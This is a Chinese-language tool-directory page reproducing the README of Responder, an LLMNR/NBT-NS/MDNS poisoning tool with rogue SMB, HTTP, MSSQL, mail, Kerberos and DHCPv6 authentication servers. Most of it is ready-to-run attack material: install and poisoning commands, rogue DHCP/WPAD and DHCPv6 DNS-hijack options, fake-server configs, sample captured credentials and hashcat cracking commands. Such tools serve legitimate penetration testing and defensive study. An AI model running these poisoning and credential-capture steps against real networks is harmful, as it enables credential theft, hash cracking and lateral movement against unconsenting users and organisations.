Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Responder — Responder是一款LLMNR、NBT-NS和MDNS投毒工具,内置HTTP/SMB/MSSQL/FTP/LDAP欺诈认证服务器,支持NTLMv1/NTLMv2/LMv2、扩展安全NTLMSSP和基本HTTP认证。 | Kitploit
工具/GitHubGitHub/lgandx/responder
密码破解侦察密码攻击DNS和子域名枚举漏洞利用横向移动信息收集网络安全渗透测试身份验证DNS 模糊测试红队
6.5k8671233个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
DNS 分析
横向移动 分类第 7 名
密码攻击 分类第 8 名
密码破解 分类第 6 名
GitHublgandx/responder

Responder

Responder是一款LLMNR、NBT-NS和MDNS投毒工具,内置HTTP/SMB/MSSQL/FTP/LDAP欺诈认证服务器,支持NTLMv1/NTLMv2/LMv2、扩展安全NTLMSSP和基本HTTP认证。

查看仓库

Responder

Python Version License

Responder 是一个 LLMNR、NBT-NS 和 MDNS 毒化工具,内置针对 HTTP、SMB、MSSQL、FTP、LDAP、Kerberos、DNS 等协议的虚假认证服务器。它支持 NTLMv1/NTLMv2/LMv2、扩展安全 NTLMSSP 以及超过 15 种协议的各种认证方法。


目录

  • 概述
  • 新增内容
  • 安装
  • 快速开始
  • 网络毒化
  • 虚假服务器
  • 配置
  • macOS
  • 故障排除

概述

Responder 通过响应 LLMNR、NBT-NS 和 MDNS 名称解析请求来捕获凭证。当客户端尝试解析不存在的主机名时,Responder 会应答,将客户端引导至攻击者机器,在那里多个虚假认证服务器捕获凭证。同时包含 DHCP 和 DHCPv6 虚假服务器,可单独启用。

捕获的数据:

  • NetNTLMv1/v2 哈希 - 可使用 hashcat/john 破解
  • Kerberos AS-REQ 哈希 - 离线破解(hashcat -m 7500)
  • 明文凭证 - HTTP Basic、FTP、SMTP、IMAP、LDAP、SQL 等
  • 挑战-响应 - CRAM-MD5、DIGEST-MD5

新增内容

此版本包括:

DHCPv6 与 DNS 增强

  • ✅ DHCPv6 INFORMATION-REQUEST - 完全兼容 Windows 10/11
  • ✅ 域名过滤 - 针对特定域(DHCPv6 和 DNS)
  • ✅ 路由器通告 - 可选的 IPv6 网络毒化

邮件服务器升级

  • ✅ SMTP STARTTLS - 从现代邮件客户端捕获
  • ✅ IMAP STARTTLS - 端口 143,支持 TLS 升级
  • ✅ IMAPS - 端口 993 的原生 SSL
  • ✅ 增强的 POP3 - 更好的兼容性

Kerberos 改进

  • ✅ 强制 AS-REQ - 强制 Kerberos 认证
  • ✅ 尝试 NTLM 回退 - 获取 Kerberos 认证后返回 KDC_ERR_ETYPE_NOSUPP

协议增强

  • ✅ MSSQL - SQL Server 认证捕获
  • ✅ LDAP/LDAPS - 目录服务凭证
  • ✅ RDP - 远程桌面认证
  • ✅ WinRM - Windows 远程管理
  • ✅ DCERPC - Windows RPC 认证

安装

需求

  • Python 2.7 或 Python 3.x
  • Linux(推荐 Ubuntu、Kali、Debian)
  • Root 权限

系统依赖```bash

sudo apt-get update sudo apt-get install python3 python3-pip python3-netifaces

### 安装 Responder```bash
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt

验证安装```bash

sudo python3 Responder.py --help

---

## 快速开始

### 基础投毒```bash
# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v

# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v

DHCPv6 攻击```bash

Edit Responder.conf first:

[DHCPv6 Server]

DHCPv6_Domain = corp.local

sudo python3 Responder.py -I eth0 --dhcpv6 -v

### 强制HTTP基本认证```bash
sudo python3 Responder.py -I eth0 -b -v

启用 Proxy Auth + Rogue DHCP```bash

Enable Proxy-auth server with rogue DHCP server injecting WPAD server (highly effective)

sudo python3 Responder.py -I eth0 -Pvd

---

## 网络投毒

### LLMNR/NBT-NS/MDNS 投毒

**目的:** 响应名称解析失败

**工作原理:**
1. 客户端广播查询不存在的主机
2. 响应者回答:"我就是那个主机"
3. 客户端连接到攻击者
4. 凭据被捕获

**配置:**```ini
[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On

用法:```bash sudo python3 Responder.py -I eth0 -v

---

### DHCPv6 服务器

**目的:** 强制客户端通过 IPv6 使用攻击者的 DNS

**功能特性:**
- ✅ 支持 INFORMATION-REQUEST(Windows 10/11)
- ✅ 支持 SOLICIT/REQUEST
- ✅ 域名过滤(精确目标定位)
- ✅ 路由器通告(可选)

**工作原理:**
1. Windows 发送 DHCPv6 INFORMATION-REQUEST、SOLICIT、REQUEST
2. 响应器回应:DNS = 攻击者 IPv6
3. Windows 优先使用 IPv6 DNS
4. 所有 DNS 查询 → 攻击者
5. DNS 投毒 → 凭据捕获

**配置:**```ini
[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local

; Send Router Advertisements
SendRA = Off

; IPv6 address to advertise
BindToIPv6 = fe80::1

用法:```bash sudo python3 Responder.py -I eth0 --dhcpv6 -v

**预期输出:**```
[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: [email protected]:Password123

伪造服务器

Responder 包含 17 个以上的伪造认证服务器:

文件与网络服务

SMB 服务器(端口 445、139)

用途: 从文件共享捕获 NetNTLM 哈希

特性:

  • ✅ SMBv1/SMBv2/SMBv3
  • ✅ NetNTLMv1/v2 哈希捕获
  • ✅ 扩展安全 NTLMSSP
  • ✅ 禁用会话签名(允许中继)

触发方式:```powershell

UNC paths

\attacker-ip\share \non-existent-server\files

NET USE commands

net use \attacker-ip\share

Windows Explorer address bar

\attacker-ip\

**捕获的格式:**```
username::domain:challenge:response:blob

破解:```bash hashcat -m 5600 smb-ntlmv2.txt wordlist.txt

**配置:**```ini
[Responder Core]
SMB = On

FTP 服务器(端口 21)

目的: 捕获明文 FTP 凭证

功能:

  • ✅ 匿名登录蜜罐
  • ✅ USER/PASS 认证
  • ✅ 明文凭证捕获

触发器:```bash ftp attacker-ip

Username: anything

Password: anything

**捕获格式:**```
[FTP] Cleartext: username:password

配置:```ini [Responder Core] FTP = On

---

### 数据库服务器

#### MSSQL 服务器(端口 1433)

**用途:** 捕获 Microsoft SQL Server 身份验证

**功能:**
- ✅ SQL Server 身份验证
- ✅ Windows 身份验证 (NTLM)
- ✅ 明文 SQL 凭据
- ✅ NetNTLMv2 哈希捕获

**触发器:**```sql
-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows

-- Command line
sqlcmd -S attacker-ip -U sa -P password

-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;

捕获的格式:``` [MSSQL] SQL Auth: sa:password123 [MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob

**配置:**```ini
[Responder Core]
SQL = On

备注:

  • 同时捕获 SQL 认证和 Windows 认证
  • 兼容 SSMS、sqlcmd、ADO.NET 连接
  • 可通过 Windows 认证捕获域凭据

电子邮件服务器

SMTP 服务器(端口 25、587)

目的: 捕获电子邮件客户端认证

特性:

  • ✅ STARTTLS 支持(现代客户端)
  • ✅ AUTH PLAIN(明文)
  • ✅ AUTH LOGIN(明文)
  • ✅ AUTH CRAM-MD5
  • ✅ AUTH DIGEST-MD5
  • ✅ AUTH NTLM(NetNTLMv2)

STARTTLS 流程:``` Client → EHLO Server → 250-STARTTLS Client → STARTTLS Server → 220 Ready to start TLS [TLS handshake using self-signed cert] Client → AUTH PLAIN Server → Captured! ✅

**触发器:**```
Email client configuration:
- Server: attacker-ip
- Port: 25 or 587
- Security: STARTTLS or None
- Username: anything
- Password: anything

捕获的格式:``` [SMTP] LOGIN: [email protected]:Password123 [SMTP] NetNTLMv2: user::DOMAIN:challenge:response:blob [SMTP] CRAM-MD5: user:challenge:response

**配置:**```ini
[Responder Core]
SMTP = On

证书警告: 自签名证书警告属于正常现象。客户端首次连接会被拒绝,重试后成功,凭据仍会被捕获。


IMAP 服务器(端口 143)

用途: 通过 STARTTLS 捕获 IMAP 认证信息

特性:

  • ✅ STARTTLS 支持
  • ✅ LOGIN 命令(明文)
  • ✅ AUTHENTICATE PLAIN
  • ✅ AUTHENTICATE LOGIN
  • ✅ AUTHENTICATE NTLM

STARTTLS 流程:``` Client → CAPABILITY Server → * CAPABILITY IMAP4 AUTH=PLAIN AUTH=NTLM STARTTLS Client → STARTTLS Server → OK Begin TLS negotiation now [TLS upgrade] Client → LOGIN user password Server → Captured! ✅

**配置:**```ini
[Responder Core]
IMAP = On

IMAPS 服务器(端口 993)

目的: 基于 SSL 的 IMAP(原生加密)

特性:

  • ✅ 从连接开始即使用原生 SSL
  • ✅ 支持所有 IMAP 认证方法
  • ✅ 无需 STARTTLS(已加密)

与普通 IMAP 的区别:``` Port 143 (IMAP): Plain → STARTTLS → Encrypted Port 993 (IMAPS): Encrypted from start

**配置:**```ini
[Responder Core]
IMAPS = On

POP3 服务器(端口 110)

目的: 捕获 POP3 电子邮件检索凭据

功能:

  • ✅ USER/PASS 认证
  • ✅ APOP(MD5 挑战)
  • ✅ 明文凭据捕获

触发器:``` Email client:

  • Protocol: POP3
  • Server: attacker-ip
  • Port: 110
**捕获格式:**```
[POP3] USER: username
[POP3] PASS: password

配置:```ini [Responder Core] POP = On

---

### Web 服务器

#### HTTP 服务器(端口 80)

**用途:** 捕获 Web 认证

**特性:**
- ✅ NTLM 认证(NetNTLMv1/v2)
- ✅ 基本认证(明文)
- ✅ 摘要认证(MD5)
- ✅ WPAD 注入

**触发器:**```
Browser: http://attacker-ip/
UNC: file://attacker-ip/share
WPAD: Automatic proxy detection

强制基本认证:```bash sudo python3 Responder.py -I eth0 -b

**捕获的格式:**```
[HTTP] NTLM NTLMv2: user::DOMAIN:challenge:response:blob
[HTTP] Basic: user:password
[HTTP] Digest: user:realm:hash

配置:```ini [Responder Core] HTTP = On

---

#### HTTPS 服务器(端口 443)

**用途:** 带认证捕获的 HTTPS

**特点:**
- ✅ SSL/TLS 加密
- ✅ 所有 HTTP 认证方法
- ✅ 自签名证书
- ✅ 基于 HTTPS 的 WPAD

**配置:**```ini
[Responder Core]
HTTPS = On
SSLCert = certs/responder.crt
SSLKey = certs/responder.key

目录与身份验证

Kerberos 服务器(端口 88)

目的: 捕获 AS-REP 哈希,用于离线破解

特性:

  • ✅ AES256-CTS-HMAC-SHA1-96(etype 18)
  • ✅ AES128-CTS-HMAC-SHA1-96(etype 17)
  • ✅ ARCFOUR-HMAC-MD5(etype 23)

工作原理:

  1. 客户端发送 AS-REQ(TGT 请求)
  2. 响应器:“需要预身份验证”
  3. 客户端发送带有加密时间戳的 AS-REQ
  4. 响应器捕获加密时间戳
  5. 使用 hashcat 进行离线破解
下载工具